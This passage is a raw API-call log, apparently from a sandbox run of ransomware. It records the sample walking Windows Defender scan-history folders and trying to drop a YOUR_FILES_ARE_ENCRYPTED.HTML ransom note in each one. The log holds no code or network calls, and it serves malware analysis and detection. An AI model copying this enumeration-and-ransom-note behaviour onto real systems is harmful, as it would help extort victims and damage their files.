dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.317] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.317] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.317] GetProcessHeap () returned 0x600000 [0110.317] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\14\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.317] GetProcessHeap () returned 0x600000 [0110.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.318] GetProcessHeap () returned 0x600000 [0110.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.319] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="15", cAlternateFileName="")) returned 1 [0110.319] StrStrIW (lpFirst="15", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.319] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15") returned 83 [0110.319] GetProcessHeap () returned 0x600000 [0110.319] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.320] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15" [0110.320] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\*" [0110.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3aa287, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.320] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3aa287, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.320] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="196", cAlternateFileName="")) returned 1 [0110.320] StrStrIW (lpFirst="196", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.320] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\196") returned 87 [0110.320] PathFindExtensionW (pszPath="196") returned="" [0110.320] lstrlenW (lpString="") returned 0 [0110.320] PathFindExtensionW (pszPath="196") returned="" [0110.320] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="262", cAlternateFileName="")) returned 1 [0110.320] StrStrIW (lpFirst="262", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.320] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\262") returned 87 [0110.320] PathFindExtensionW (pszPath="262") returned="" [0110.320] lstrlenW (lpString="") returned 0 [0110.320] PathFindExtensionW (pszPath="262") returned="" [0110.320] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="288", cAlternateFileName="")) returned 1 [0110.320] StrStrIW (lpFirst="288", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.320] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\288") returned 87 [0110.320] PathFindExtensionW (pszPath="288") returned="" [0110.321] lstrlenW (lpString="") returned 0 [0110.321] PathFindExtensionW (pszPath="288") returned="" [0110.321] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3aa287, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3aa287, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3aef75, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.321] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3aa287, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3aa287, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3aef75, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.321] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.321] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.321] GetProcessHeap () returned 0x600000 [0110.321] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\15\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.321] GetProcessHeap () returned 0x600000 [0110.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.321] GetProcessHeap () returned 0x600000 [0110.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.322] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="17", cAlternateFileName="")) returned 1 [0110.322] StrStrIW (lpFirst="17", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.322] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17") returned 83 [0110.322] GetProcessHeap () returned 0x600000 [0110.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.324] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17" [0110.324] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\*" [0110.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3c27d6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.324] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3c27d6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.324] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="109001", cAlternateFileName="")) returned 1 [0110.324] StrStrIW (lpFirst="109001", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.324] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\109001") returned 90 [0110.324] PathFindExtensionW (pszPath="109001") returned="" [0110.324] lstrlenW (lpString="") returned 0 [0110.324] PathFindExtensionW (pszPath="109001") returned="" [0110.324] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="193", cAlternateFileName="")) returned 1 [0110.324] StrStrIW (lpFirst="193", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.324] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\193") returned 87 [0110.324] PathFindExtensionW (pszPath="193") returned="" [0110.324] lstrlenW (lpString="") returned 0 [0110.324] PathFindExtensionW (pszPath="193") returned="" [0110.324] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="300", cAlternateFileName="")) returned 1 [0110.324] StrStrIW (lpFirst="300", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.324] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\300") returned 87 [0110.324] PathFindExtensionW (pszPath="300") returned="" [0110.324] lstrlenW (lpString="") returned 0 [0110.324] PathFindExtensionW (pszPath="300") returned="" [0110.324] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3c146d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3c146d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3c76c0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.324] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3c146d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3c146d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3c76c0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.325] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.325] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.325] GetProcessHeap () returned 0x600000 [0110.325] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\17\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.325] GetProcessHeap () returned 0x600000 [0110.325] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.325] GetProcessHeap () returned 0x600000 [0110.325] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.326] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="18", cAlternateFileName="")) returned 1 [0110.326] StrStrIW (lpFirst="18", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.326] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18") returned 83 [0110.326] GetProcessHeap () returned 0x600000 [0110.327] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.328] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18" [0110.328] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\*" [0110.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3d7d0f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.328] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf3d7d0f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.328] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="107001", cAlternateFileName="")) returned 1 [0110.328] StrStrIW (lpFirst="107001", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.328] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\107001") returned 90 [0110.328] PathFindExtensionW (pszPath="107001") returned="" [0110.328] lstrlenW (lpString="") returned 0 [0110.328] PathFindExtensionW (pszPath="107001") returned="" [0110.328] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="107002", cAlternateFileName="")) returned 1 [0110.328] StrStrIW (lpFirst="107002", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.328] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\107002") returned 90 [0110.328] PathFindExtensionW (pszPath="107002") returned="" [0110.328] lstrlenW (lpString="") returned 0 [0110.328] PathFindExtensionW (pszPath="107002") returned="" [0110.328] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="109002", cAlternateFileName="")) returned 1 [0110.328] StrStrIW (lpFirst="109002", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.329] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\109002") returned 90 [0110.329] PathFindExtensionW (pszPath="109002") returned="" [0110.329] lstrlenW (lpString="") returned 0 [0110.329] PathFindExtensionW (pszPath="109002") returned="" [0110.329] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="195", cAlternateFileName="")) returned 1 [0110.329] StrStrIW (lpFirst="195", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.329] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\18\\195") returned 87 [0110.329] PathFindExtensionW (pszPath="195") returned="" [0110.329] lstrlenW (lpString="") returned 0 [0110.329] PathFindExtensionW (pszPath="195") returned="" [0110.329] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3d7d0f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3d7d0f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3dcaf9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.329] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3d7d0f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf3d7d0f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf3dcaf9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, 